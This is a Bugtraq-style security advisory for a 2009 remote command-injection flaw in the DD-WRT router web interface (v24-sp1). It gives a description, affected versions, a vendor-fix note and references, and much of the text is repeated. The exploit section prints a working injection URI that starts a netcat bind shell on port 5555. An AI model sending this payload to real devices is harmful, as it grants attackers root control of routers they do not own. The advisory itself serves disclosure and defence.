DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
BID:35742
Info
DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
| Bugtraq ID: | 35742 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 20 2009 12:00AM |
| Updated: | Jul 24 2009 07:26PM |
| Credit: | gat3way |
| Vulnerable: |
DD-WRT DD-WRT v24.sp1 DD-WRT DD-WRT v24-sp1 DD-WRT DD-WRT v24 |
| Not Vulnerable: | |
Discussion
DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
DD-WRT is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with superuser privileges, which may facilitate a complete compromise of the affected device.
DD-WRT v24-sp1 is affected; other versions may also be vulnerable.
DD-WRT is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with superuser privileges, which may facilitate a complete compromise of the affected device.
DD-WRT v24-sp1 is affected; other versions may also be vulnerable.
Exploit / POC
DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
To exploit these issues, attackers may use a browser or readily available network utilities.
The following example URI is available:
http://www.example.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
The following exploit is available:
To exploit these issues, attackers may use a browser or readily available network utilities.
The following example URI is available:
http://www.example.com/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
The following exploit is available:
Solution / Fix
DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
Solution:
Vendor fixes are available. Please see the references for details.
Solution:
Vendor fixes are available. Please see the references for details.
References
DD-WRT Web Management Interface Remote Arbitrary Shell Command Injection Vulnerability
References:
References:
- DD-WRT httpd vulnerability (milw0rm.com report) (DD-WRT)
- Vendor Homepage (DD-WRT)